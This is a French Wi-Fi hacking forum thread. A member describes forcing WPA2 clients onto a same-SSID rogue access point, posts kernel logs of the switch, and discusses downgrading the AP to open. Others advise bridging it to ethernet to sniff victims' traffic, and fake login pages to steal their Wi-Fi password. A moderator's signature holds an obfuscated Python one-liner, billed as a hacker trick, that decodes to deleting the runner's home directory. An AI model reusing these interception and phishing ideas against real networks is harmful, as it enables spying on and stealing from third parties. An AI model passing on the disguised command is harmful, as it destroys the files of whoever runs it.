Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-04-2011 22:17:29

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

De la rogue sécurisée a l'open?

Aparement il est possible de faire connecter un client automatiquement avec un ap en WPA2 a un autre sur le meme canal et le meme ssid:
capture3cx.png

La question que je me pose c'est, a partir de la, comment passer la rogue en open sans que le client ne reparte se connecter sur son ap d'origine...car aireplay empeche la reconnexion au vrai ap mais ne donne pas pour autant la reconnexion sur la rogue passé en open.

Ah j'oubliais les logs de dmesg lors de la reconnexion automatique au fake AP sécurisée:

[ 9065.315595] ath9k: Two wiphys trying to scan at the same time
[ 9065.315716] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9065.515990] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 1)
[ 9065.519558] wlan0: direct probe responded
[ 9065.519566] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 1)
[ 9065.526741] wlan0: authenticated
[ 9065.526775] wlan0: associate with AP 00:19:70:44:e1:69 (try 1)
[ 9065.531931] wlan0: RX AssocResp from 00:19:70:44:e1:69 (capab=0x431 status=0 aid=1)
[ 9065.531936] wlan0: associated
[ 9075.545985] wlan0: deauthenticating from 00:19:70:44:e1:69 by local choice (reason=3)
[ 9075.745793] ath9k: Two wiphys trying to scan at the same time
[ 9075.745896] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9075.949510] wlan0: direct probe to AP 00:24:d4:d9:c6:3c (try 1)
[ 9075.952804] wlan0: direct probe responded
[ 9075.952811] wlan0: authenticate with AP 00:24:d4:d9:c6:3c (try 1)
[ 9075.960710] wlan0: authenticated
[ 9075.960737] wlan0: associate with AP 00:24:d4:d9:c6:3c (try 1)
[ 9075.984459] wlan0: RX AssocResp from 00:24:d4:d9:c6:3c (capab=0x411 status=0 aid=1)
[ 9075.984467] wlan0: associated
[ 9075.994727] wlan0: deauthenticated from 00:24:d4:d9:c6:3c (Reason: 7)
[ 9077.135120] wlan0: direct probe to AP 00:24:d4:d9:c6:3c (try 1)
[ 9077.142655] wlan0: deauthenticated from 00:24:d4:d9:c6:3c (Reason: 7)
[ 9088.107505] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9088.107856] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 1)
[ 9088.111735] wlan0: direct probe responded
[ 9088.111740] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 1)
[ 9088.118238] wlan0: authenticated
[ 9088.118277] wlan0: associate with AP 00:19:70:44:e1:69 (try 1)
[ 9088.121638] wlan0: RX AssocResp from 00:19:70:44:e1:69 (capab=0x431 status=0 aid=1)
[ 9088.121643] wlan0: associated
[ 9098.133765] wlan0: deauthenticating from 00:19:70:44:e1:69 by local choice (reason=3)
[ 9098.326177] ath9k: Two wiphys trying to scan at the same time
[ 9098.326211] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9098.525841] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 1)
[ 9098.530163] wlan0: direct probe responded
[ 9098.530167] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 1)
[ 9098.533986] wlan0: authenticated
[ 9098.534004] wlan0: associate with AP 00:19:70:44:e1:69 (try 1)
[ 9098.539312] wlan0: RX AssocResp from 00:19:70:44:e1:69 (capab=0x431 status=0 aid=1)
[ 9098.539316] wlan0: associated
[ 9108.543974] wlan0: deauthenticating from 00:19:70:44:e1:69 by local choice (reason=3)
[ 9108.744381] ath9k: Two wiphys trying to scan at the same time
[ 9108.745262] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9108.944060] wlan0: direct probe to AP 00:24:d4:d9:c6:3c (try 1)
[ 9108.947310] wlan0: direct probe responded
[ 9108.947312] wlan0: authenticate with AP 00:24:d4:d9:c6:3c (try 1)
[ 9108.950904] wlan0: authenticated
[ 9108.950921] wlan0: associate with AP 00:24:d4:d9:c6:3c (try 1)
[ 9108.974144] wlan0: RX AssocResp from 00:24:d4:d9:c6:3c (capab=0x411 status=0 aid=1)
[ 9108.974147] wlan0: associated
[ 9108.989017] wlan0: deauthenticated from 00:24:d4:d9:c6:3c (Reason: 7)
[ 9110.121640] wlan0: direct probe to AP 00:24:d4:d9:c6:3c (try 1)
[ 9110.122179] wlan0: deauthenticated from 00:24:d4:d9:c6:3c (Reason: 7)
[ 9121.085448] wlan0: direct probe to AP 00:24:d4:d9:c6:3c (try 1)
[ 9121.085478] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9121.085509] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 1)
[ 9121.091973] wlan0: direct probe responded
[ 9121.091983] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 1)
[ 9121.291713] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 2)
[ 9121.306121] wlan0: authenticated
[ 9121.306168] wlan0: associate with AP 00:19:70:44:e1:69 (try 1)
[ 9121.311431] wlan0: RX AssocResp from 00:19:70:44:e1:69 (capab=0x431 status=0 aid=1)
[ 9121.311436] wlan0: associated
[ 9125.760706] wlan0: deauthenticating from 00:19:70:44:e1:69 by local choice (reason=3)
[ 9132.365705] wlan0: deauthenticating from 00:24:d4:d9:c6:3c by local choice (reason=3)
[ 9132.564451] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 1)
[ 9132.762952] wlan0: direct probe to AP 00:19:70:44:e1:69 (try 2)
[ 9132.768882] wlan0: direct probe responded
[ 9132.768889] wlan0: authenticate with AP 00:19:70:44:e1:69 (try 1)
[ 9132.772036] wlan0: authenticated
[ 9132.772074] wlan0: associate with AP 00:19:70:44:e1:69 (try 1)
[ 9132.775460] wlan0: RX AssocResp from 00:19:70:44:e1:69 (capab=0x431 status=0 aid=1)
[ 9132.775464] wlan0: associated
[email protected]:~$

Dernière modification par koala (08-04-2011 22:28:28)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-04-2011 21:51:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : De la rogue sécurisée a l'open?

Personne n'a d'idée, imaginez, une reconnexion automatique a l'ap forçant ainsi la personne a se connecter sans avoir besoin d'attendre wink puis ensuite passage a l'open pour pouvoir apercevoir et faire ce que l'on veut du trafic transitent sur le réseau.

Hors Ligne

#3 10-04-2011 22:42:55

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : De la rogue sécurisée a l'open?

Attends, que je sois sûr de bien comprendre... T'es en train de me dire que tu peux forcer une victime à switcher automatiquement sur ton propre faux réseau en WPA (ce qui pour moi relève de l'exploit tout en étant vachement chelou quand même !), et tu voudrais ensuite downgrader ton faux réseau en OPN juste pour voir le trafic de la cible ?? big_smile

Te fais pas ch*er, crée-toi un bridge entre ton interface wifi (celle du rogue) et une carte ethernet pour transférer tout le trafic vers le câble, et analyse le trafic qui y passe avec Wireshark smile
Éventuellement tu peux même brancher ledit câble sur une box (par exemple) pour fournir le net au rogue-AP, qui sera encore moins suspect ! Bon, y a un peu de travail de routage à faire pour ça, mais c'est pas infaisable non plus...

Je reste quand même perplexe face à ta redirection automatique vers le rogue, comment tu l'as mis en place pour qu'il aie le même mot de passe que le vrai réseau-cible alors que tu ne connais pas encore ce dernier ? Tu sais détailler un peu ?

Hors Ligne

#4 11-04-2011 12:11:57

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : De la rogue sécurisée a l'open?

Salut wink

Attends, que je sois sûr de bien comprendre... T'es en train de me dire que tu peux forcer une victime à switcher automatiquement sur ton propre faux réseau en WPA

C'est bien ça pourtant

Te fais pas ch*er, crée-toi un bridge entre ton interface wifi (celle du rogue) et une carte ethernet pour transférer tout le trafic vers le câble, et analyse le trafic qui y passe avec Wireshark

Oué je suis con des fois lol

Je reste quand même perplexe face à ta redirection automatique vers le rogue, comment tu l'as mis en place pour qu'il aie le même mot de passe que le vrai réseau-cible alors que tu ne connais pas encore ce dernier ? Tu sais détailler un peu ?

Ça serait trop facil de dire comment d'autant plus que ça m'a pris du temps de tester, coder et découvrir ça wink si il y avait eut une section fermé... smile

Dernière modification par koala (11-04-2011 12:13:25)

Hors Ligne

#5 11-04-2011 13:14:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : De la rogue sécurisée a l'open?

koala a écrit :

Ça serait trop facil de dire comment d'autant plus que ça m'a pris du temps de tester, coder et découvrir ça wink si il y avait eut une section fermé... smile

Rhaaa, mais c'est de la cruauté ça ! Piquer notre curiosité à vif pour finalement ne rien révéler, c'est vicieux ! tongue

En même temps, je m'attendais un peu à une réponse du genre, c'est normal... Si tu veux bien partager des détails par MP je suis ouvertement preneur (ça m'intrigue franchement ton truc), sinon ben dommage je resterai sur ma faim et je te souhaite bonne chance, t'as l'air de tenir un truc sérieux là ! smile

Sans rancune wink

Hors Ligne

#6 11-04-2011 16:04:42

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : De la rogue sécurisée a l'open?

Au passage, si tu as le temps d'envoyer un deuxième MP, je suis là ! big_smile


Sharkoff

Hors Ligne

#7 11-04-2011 17:41:03

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : De la rogue sécurisée a l'open?

Koala, tu fais des décourtes tout simplement magnifique, si j'ai bien compris, tu redirige ta victime depuis un réseau WPA sur ton faux réseau, c'est bien ca ?
Je pense qu'une fois que tu arrive à la connectée, tu peux le retirer le mot de passe de sa box ou une connerie dans le genre, ce qui serait magique X)

Hors Ligne

#8 11-04-2011 19:00:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : De la rogue sécurisée a l'open?

si j'ai bien compris, tu redirige ta victime depuis un réseau WPA sur ton faux réseau, c'est bien ca ?

oui wink

Je pense qu'une fois que tu arrive à la connectée, tu peux le retirer le mot de passe de sa box ou une connerie dans le genre, ce qui serait magique X)

Effectivement, après on reprend le principe de l'open une fois le client connecté a savoir apache2 avec les fake pages ou wireless key view smile le plus dur et de ruser la connexion automatique.

Dernière modification par koala (11-04-2011 19:01:25)

Hors Ligne

#9 11-04-2011 21:38:08

faptiem
Membre Indéboulonnable
Inscription : 29-04-2010
Messages : 127

Re : De la rogue sécurisée a l'open?

Koala superstar

this-thread-is-relevant-to-my-interests.jpg

Dernière modification par faptiem (11-04-2011 21:38:54)

Hors Ligne

#10 11-04-2011 21:50:44

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : De la rogue sécurisée a l'open?

Je préfère rester humble car si je le fais vous pouvez le faire aussi wink attention aux mal de tètes commum mais bon ceci dit j'avoue etre surpris.

Dernière modification par koala (11-04-2011 21:52:04)

Hors Ligne

#11 11-04-2011 22:11:29

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : De la rogue sécurisée a l'open?

673859superkoala.jpg


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#12 11-04-2011 22:26:43

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : De la rogue sécurisée a l'open?

_|||_     <--- Ceci est un chapeau


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#13 18-07-2011 19:35:06

see777
Membre
Inscription : 17-07-2011
Messages : 18

Re : De la rogue sécurisée a l'open?

Comment faire connecter le client a l'ap automatiquement???

Hors Ligne

#14 10-08-2011 20:35:26

see777
Membre
Inscription : 17-07-2011
Messages : 18

Re : De la rogue sécurisée a l'open?

bon il a pas l'air de vouloir répondre a mes mail ce koala la de mes fesses... hmm je ne comprends pas tout la, sur la foto figure deux ssid exact avec un hanshake sur l'un et les deux réseaux sont crypté en wpa deux comment a t-il pu faire ça? amoin kil est crypté le rogue aussi, jpige plus la et pourtant je cherche aussi.

Hors Ligne

#15 10-08-2011 20:40:41

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : De la rogue sécurisée a l'open?

see777 a écrit :

bon il a pas l'air de vouloir répondre a mes mail ce koala la de mes fesses... hmm

Tss tss tss, on se calme.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#16 16-08-2011 21:31:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : De la rogue sécurisée a l'open?

@see

Je vous expliquerai cette methode en temps voulu, elle a encore besoin d'experimentation, je veux prendre le temps de faire quelque chose de vraiment bien au lieux de lacher ca sans avoir explorer le tout a fond et faire un flop.Ce forum sera le premier au courant de mes recherches une fois celle ci accompli smile

bon il a pas l'air de vouloir répondre a mes mail ce koala la de mes fesses...

Je frequente ce forum et je respecte les gens qui le cotoie donc fais en autant merci.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2211 28-11-2016 19:42:10 par koala
35 1873 23-11-2016 16:31:33 par roofnat
16 1051 17-11-2016 12:22:00 par disquette
10 442 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 455 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]